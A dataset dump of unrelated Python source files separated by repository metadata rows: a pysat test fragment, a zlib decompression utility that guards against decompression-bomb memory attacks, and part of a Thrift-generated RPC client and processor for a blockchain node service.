'testing_file')))
pysat.instruments.pysat_testing.list_files = list_files
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
file_format=''.join(('pysat_testing_unique_??_',
'???_{year:04d}_g_{day:03d}',
'_st.pysat_testing_file')),
update_files=True,
temporary_file_list=self.temporary_file_list)
assert (np.all(self.testInst.files.files.index == dates))
class TestInstrumentWithVersionedFilesNoFileListStorage(TestInstrumentWithVersionedFiles):
def __init__(self, temporary_file_list=True):
self.temporary_file_list = temporary_file_list
| 45.922065 | 94 | 0.560534 | 5,218 | 45,371 | 4.642392 | 0.057877 | 0.056473 | 0.049827 | 0.049042 | 0.901998 | 0.88755 | 0.883174 | 0.864267 | 0.856258 | 0.853369 | 0 | 0.041066 | 0.341452 | 45,371 | 987 | 95 | 45.968592 | 0.769671 | 0.099821 | 0 | 0.753053 | 0 | 0.001357 | 0.078279 | 0.046392 | 0 | 0 | 0 | 0 | 0.054274 | 1 | 0.074627 | false | 0.006784 | 0.016282 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6c79575e267e4365e630df9f6320d5d4322dd12f | 14,962 | py | Python | contrib/zlibutil.py | Hasimir/mixminion | 705c4b21d3d43631007821bd73423908a075c689 | [
"MIT"
] | 51 | 2015-02-01T02:09:29.000Z | 2022-02-23T16:07:09.000Z | contrib/zlibutil.py | cybernetics/mixminion | 35b33d945afb89a0a7438219c2e89906e0191e61 | [
"MIT"
] | 1 | 2015-08-23T12:21:09.000Z | 2015-08-23T12:21:09.000Z | contrib/zlibutil.py | cybernetics/mixminion | 35b33d945afb89a0a7438219c2e89906e0191e61 | [
"MIT"
] | 10 | 2015-03-13T12:34:29.000Z | 2022-02-13T07:49:23.000Z | #!/usr/bin/env python
#
# Copyright (c) 2002 Bryce "Zooko" Wilcox-O'Hearn
# portions Copyright (c) 2001 Autonomous Zone Industries
# This file is licensed under the
# GNU Lesser General Public License v2.1.
# See the file COPYING or visit http://www.gnu.org/ for details.
# Python standard library modules
import exceptions, string, types, zlib
# XXXX (I've added this line since we never seem to import hr.) -NM
hr = repr
true = 1
false = 0
class DecompressError(exceptions.StandardError, zlib.error): pass
class UnsafeDecompressError(DecompressError): pass # This means it would take more memory to decompress than we can spare.
class TooBigError(DecompressError): pass # This means the resulting uncompressed text would exceed the maximum allowed length.
class ZlibError(DecompressError): pass # internal error, probably due to the input not being zlib compressed text
def safe_zlib_decompress_to_retval(zbuf, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 32 KB chunks of compressiontext at a bite.)
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
availmem = availmem / 2 # generating the result string from the intermediate strings will require using the same amount of memory again, briefly. If you care about this kind of thing, then let's rewrite this module in C.
decompstrlist = []
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can depend on Python 2.1 with lexical scoping, we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, hr(le), )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
decompstrlist.append(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
if lentmpstr > 0:
decompstrlist.append(tmpstr)
tmpstr = ''
# string.join handles the empty-list case; the old fallthrough indexed
# decompstrlist[0], which raises IndexError when the list is empty
return string.join(decompstrlist, '')
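Later Pythons expose this bound directly: `Decompress.decompress(data, max_length)` caps the output of a single call and parks the unread compressed input in `unconsumed_tail`, which is the primitive the chunked loop above builds by hand. A minimal sketch (Python 3 syntax, outside this module's Python 2 style):

```python
import zlib

bomb = zlib.compress(b'\x00' * 1000000)  # ~1 MB of zeros shrinks to ~1 KB
d = zlib.decompressobj()
out = d.decompress(bomb, 4096)  # never emit more than 4096 bytes per call
assert len(out) == 4096
assert d.unconsumed_tail  # leftover compressed input to feed back later
```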
def safe_zlib_decompress_to_file(zbuf, fileobj, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
Note that this assumes that data written to `fileobj' continues to take up memory.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 64 KB chunks of compressiontext at a bite.)
@param fileobj the decompressed text will be written to it
@precondition `fileobj' must be an IO.: fileobj is not None
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert fileobj is not None, "precondition: `fileobj' must be an IO."
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can use 2.1 lexical scoping we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
def safe_zlib_decompress_spool_to_file(zbuf, fileobj, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
Note that this assumes that data written to `fileobj' does *not* continue to occupy memory.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 64 KB chunks of compressiontext at a bite.)
@param fileobj the decompressed text will be written to it
@precondition `fileobj' must be an IO.: fileobj is not None
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert fileobj is not None, "precondition: `fileobj' must be an IO."
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
tmpstr = ''
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can use 2.1 lexical scoping we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
| 68.009091 | 657 | 0.677851 | 2,081 | 14,962 | 4.864488 | 0.141278 | 0.006223 | 0.017781 | 0.01304 | 0.890448 | 0.886101 | 0.886101 | 0.88294 | 0.88294 | 0.88294 | 0 | 0.019841 | 0.218487 | 14,962 | 219 | 658 | 68.319635 | 0.845891 | 0.244018 | 0 | 0.864662 | 0 | 0.067669 | 0.179286 | 0 | 0 | 0 | 0 | 0.013699 | 0.06015 | 0 | null | null | 0.030075 | 0.007519 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
dd21911b1df076073cb424d5642d2a0e7a323b2e | 85,495 | py | Python | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | 18 | 2016-12-05T22:36:07.000Z | 2021-11-14T14:13:09.000Z | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | 12 | 2016-12-24T14:18:13.000Z | 2020-07-22T21:11:36.000Z | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import logging
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def get_node_info(self):
pass
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
pass
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
pass
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
pass
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
pass
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
pass
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
pass
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
pass
def receipt_request(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
pass
def transfer_data(self, pass_phrase, received, unreceived):
"""
Parameters:
- pass_phrase
- received
- unreceived
"""
pass
def subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
"""
Parameters:
- subscription_id
- criteria
- phase_criteria
- create_ts
- public_key
"""
pass
def subscription_request(self, subscription_id, subscription_signature):
"""
Parameters:
- subscription_id
- subscription_signature
"""
pass
def get_peers(self):
pass
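The generated Client below pairs each RPC with a send_/recv_ method over a protocol object: send_X serializes the arguments with a sequence id, recv_X reads the matching result back. A minimal sketch of that stub pattern, using a hypothetical in-memory transport (EchoTransport, PingClient) instead of Thrift's real TSocket/TBinaryProtocol machinery:

```python
# Sketch of the send_/recv_ stub pattern used by generated Thrift clients.
# EchoTransport stands in for a real server connection; the generated code
# serializes args with a TProtocol instead of passing dicts around.
class EchoTransport:
    def __init__(self):
        self.inbox = []  # replies queued for the client

    def send(self, msg):
        # a real server would dispatch on msg['name']; echo the seqid back
        self.inbox.append({'seqid': msg['seqid'], 'result': 'pong'})

    def recv(self):
        return self.inbox.pop(0)

class PingClient:
    def __init__(self, transport):
        self._trans = transport
        self._seqid = 0

    def ping(self):
        # same shape as the generated code: send, then block on the reply
        self.send_ping()
        return self.recv_ping()

    def send_ping(self):
        self._seqid += 1
        self._trans.send({'name': 'ping', 'seqid': self._seqid})

    def recv_ping(self):
        reply = self._trans.recv()
        assert reply['seqid'] == self._seqid  # pair reply with request
        return reply['result']
```

The sequence id is what lets the real client detect a mismatched or stale reply on a shared connection.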
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = ping_result()
result.read(iprot)
iprot.readMessageEnd()
return
def get_node_info(self):
self.send_get_node_info()
return self.recv_get_node_info()
def send_get_node_info(self):
self._oprot.writeMessageBegin('get_node_info', TMessageType.CALL, self._seqid)
args = get_node_info_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_node_info(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_node_info_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_node_info failed: unknown result")
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
self.send_register_node(node, pass_phrase)
return self.recv_register_node()
def send_register_node(self, node, pass_phrase):
self._oprot.writeMessageBegin('register_node', TMessageType.CALL, self._seqid)
args = register_node_args()
args.node = node
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_register_node(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = register_node_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "register_node failed: unknown result")
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
self.send_unregister_node(pass_phrase)
def send_unregister_node(self, pass_phrase):
self._oprot.writeMessageBegin('unregister_node', TMessageType.ONEWAY, self._seqid)
args = unregister_node_args()
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
self.send_phase_1_message(p1)
return self.recv_phase_1_message()
def send_phase_1_message(self, p1):
self._oprot.writeMessageBegin('phase_1_message', TMessageType.CALL, self._seqid)
args = phase_1_message_args()
args.p1 = p1
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_1_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_1_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_1_message failed: unknown result")
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
self.send_phase_2_message(p2)
return self.recv_phase_2_message()
def send_phase_2_message(self, p2):
self._oprot.writeMessageBegin('phase_2_message', TMessageType.CALL, self._seqid)
args = phase_2_message_args()
args.p2 = p2
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_2_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_2_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_2_message failed: unknown result")
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
self.send_phase_3_message(p3)
return self.recv_phase_3_message()
def send_phase_3_message(self, p3):
self._oprot.writeMessageBegin('phase_3_message', TMessageType.CALL, self._seqid)
args = phase_3_message_args()
args.p3 = p3
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_3_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_3_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_3_message failed: unknown result")
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
self.send_phase_4_message(p4)
return self.recv_phase_4_message()
def send_phase_4_message(self, p4):
self._oprot.writeMessageBegin('phase_4_message', TMessageType.CALL, self._seqid)
args = phase_4_message_args()
args.p4 = p4
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_4_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_4_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_4_message failed: unknown result")
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
self.send_phase_5_message(p5)
return self.recv_phase_5_message()
def send_phase_5_message(self, p5):
self._oprot.writeMessageBegin('phase_5_message', TMessageType.CALL, self._seqid)
args = phase_5_message_args()
args.p5 = p5
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_5_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_5_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_5_message failed: unknown result")
def receipt_request(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
self.send_receipt_request(pass_phrase)
return self.recv_receipt_request()
def send_receipt_request(self, pass_phrase):
self._oprot.writeMessageBegin('receipt_request', TMessageType.CALL, self._seqid)
args = receipt_request_args()
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_receipt_request(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = receipt_request_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "receipt_request failed: unknown result")
def transfer_data(self, pass_phrase, received, unreceived):
"""
Parameters:
- pass_phrase
- received
- unreceived
"""
self.send_transfer_data(pass_phrase, received, unreceived)
return self.recv_transfer_data()
def send_transfer_data(self, pass_phrase, received, unreceived):
self._oprot.writeMessageBegin('transfer_data', TMessageType.CALL, self._seqid)
args = transfer_data_args()
args.pass_phrase = pass_phrase
args.received = received
args.unreceived = unreceived
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transfer_data(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transfer_data_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transfer_data failed: unknown result")
def subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
"""
Parameters:
- subscription_id
- criteria
- phase_criteria
- create_ts
- public_key
"""
self.send_subscription_provisioning(subscription_id, criteria, phase_criteria, create_ts, public_key)
self.recv_subscription_provisioning()
def send_subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
self._oprot.writeMessageBegin('subscription_provisioning', TMessageType.CALL, self._seqid)
args = subscription_provisioning_args()
args.subscription_id = subscription_id
args.criteria = criteria
args.phase_criteria = phase_criteria
args.create_ts = create_ts
args.public_key = public_key
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_subscription_provisioning(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = subscription_provisioning_result()
result.read(iprot)
iprot.readMessageEnd()
return
def subscription_request(self, subscription_id, subscription_signature):
"""
Parameters:
- subscription_id
- subscription_signature
"""
self.send_subscription_request(subscription_id, subscription_signature)
return self.recv_subscription_request()
def send_subscription_request(self, subscription_id, subscription_signature):
self._oprot.writeMessageBegin('subscription_request', TMessageType.CALL, self._seqid)
args = subscription_request_args()
args.subscription_id = subscription_id
args.subscription_signature = subscription_signature
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_subscription_request(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = subscription_request_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "subscription_request failed: unknown result")
def get_peers(self):
self.send_get_peers()
return self.recv_get_peers()
def send_get_peers(self):
self._oprot.writeMessageBegin('get_peers', TMessageType.CALL, self._seqid)
args = get_peers_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_peers(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_peers_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_peers failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["get_node_info"] = Processor.process_get_node_info
self._processMap["register_node"] = Processor.process_register_node
self._processMap["unregister_node"] = Processor.process_unregister_node
self._processMap["phase_1_message"] = Processor.process_phase_1_message
self._processMap["phase_2_message"] = Processor.process_phase_2_message
self._processMap["phase_3_message"] = Processor.process_phase_3_message
self._processMap["phase_4_message"] = Processor.process_phase_4_message
self._processMap["phase_5_message"] = Processor.process_phase_5_message
self._processMap["receipt_request"] = Processor.process_receipt_request
self._processMap["transfer_data"] = Processor.process_transfer_data
self._processMap["subscription_provisioning"] = Processor.process_subscription_provisioning
